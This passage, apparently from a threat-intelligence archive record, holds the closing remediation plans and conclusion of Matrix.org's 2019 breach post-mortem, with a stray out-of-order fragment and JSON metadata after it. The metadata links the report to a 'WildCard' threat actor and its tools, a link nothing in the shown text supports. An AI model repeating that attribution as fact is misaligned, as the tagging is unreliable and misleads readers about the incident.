There’s nothing more frustrating than trying to trace through the traffic\r\nfor a bug only to discover that logging didn’t pick it up.\r\nHowever, we can still improve our logging and PII-handling substantially:\r\nEnsuring that wherever possible, we hash or at least truncate any PII before logging it (access tokens, matrix IDs, 3rd\r\nparty IDs etc).\r\nMinimising log retention to the bare minimum we need to investigate recent issues and abuse\r\nEnsuring that PII is stored hashed wherever possible.\r\nMeanwhile, in Matrix itself we already are very mindful of handling PII (c.f. our privacy policies and GDPR work), but\r\nthere is also more we can do, particularly:\r\nTurning on end-to-end encryption by default, so that even if a server is compromised, the attacker cannot get at\r\nprivate message history. Everyone who uses E2EE in Matrix should have felt some relief that even though the server\r\nwas compromised, their message history was safe: we need to provide that to everyone. This is\r\nhttps://github.com/vector-im/riot-web/issues/6779.\r\nWe need device audit trails in Matrix, so that even if a compromised server (or malicious server admin) temporarily\r\nadds devices to your account, you can see what’s going on. This is https://github.com/matrix-org/synapse/issues/5145\r\nWe need to empower users to configure history retention in their rooms, so they can limit the amount of history\r\nexposed to an attacker. This is https://github.com/matrix-org/matrix-doc/pull/1763\r\nWe need to provide account portability (aka decentralised accounts) so that even if a server is compromised, the users\r\ncan seamlessly migrate elsewhere. 
The first step of this is https://github.com/matrix-org/matrix-doc/pull/1228.\r\n🔗Conclusion\r\nHopefully this gives a comprehensive overview of what happened in the breach, how we handled it, and what we are doing\r\nto protect against this happening in future.\r\nAgain, we’d like to apologise for the massive inconvenience this caused to everyone caught in the crossfire. Thank you for\r\nyour patience and for sticking with the project whilst we restored systems. And while it is very unfortunate that we ended up\r\nin this situation, we should at least be coming out of it much stronger in terms of infrastructure security. We’d also\r\nlike to particularly thank Kade Morton for providing independent review of this post and our remediations, and everyone\r\nwho reached out with #hugops during the incident (it was literally the only positive thing we had on our radar), and finally\r\nthanks to those of the Matrix team who hauled ass to rebuild the infrastructure, and also those who doubled down\r\nmeanwhile to keep the rest of the project on track.\r\nOn which note, we’re going to go back to building decentralised communication protocols and reference implementations\r\nfor a bit... Emoji reactions are on the horizon (at last!), as is Message Editing, RiotX/Android and a host of other long-awaited features - not to mention finally releasing Synapse 1.0. So: thanks again for flying Matrix, even during this period of\r\nextreme turbulence and, uh, hijack. Things should mainly be back to normal now and for the foreseeable.\r\nGiven the new blog doesn’t have comments yet, feel free to discuss the post over at HN.\r\nThe Foundation needs you\r\nThe Matrix.org Foundation is a non-profit and relies solely on donations to operate. 
Its core mission is to maintain the Matrix\r\nSpecification, but it does much more than that.\r\nIt maintains the matrix.org homeserver and hosts several bridges for free. It fights for our collective rights to digital privacy\r\nand dignity.\r\nSupport us\r\nSource: https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident/\n\ninfra - which is why it is taking a while to get full parity with where we were before. In the interest of transparency (and to try to give a sense of scale of the impact of the breach), here is the public-facing\nservice list we restored, showing priority (1 is top, 4 is bottom) and the % restore status as of May 4th:",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident/"
	],
	"report_names": [
		"post-mortem-and-remediations-for-apr-11-security-incident"
	],
	"threat_actors": [
		{
			"id": "2864e40a-f233-4618-ac61-b03760a41cbb",
			"created_at": "2023-12-01T02:02:34.272108Z",
			"updated_at": "2026-04-10T02:00:04.97558Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "ETDA:WildCard",
			"tools": [
				"RustDown",
				"SysJoker"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "256a6a2d-e8a2-4497-b399-628a7fad4b3e",
			"created_at": "2023-11-30T02:00:07.299845Z",
			"updated_at": "2026-04-10T02:00:03.484788Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "MISPGALAXY:WildCard",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434076,
	"ts_updated_at": 1775792121,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0c05a3841c348868350653525245f9c18e80ce88.pdf",
		"text": "https://archive.orkl.eu/0c05a3841c348868350653525245f9c18e80ce88.txt",
		"img": "https://archive.orkl.eu/0c05a3841c348868350653525245f9c18e80ce88.jpg"
	}
}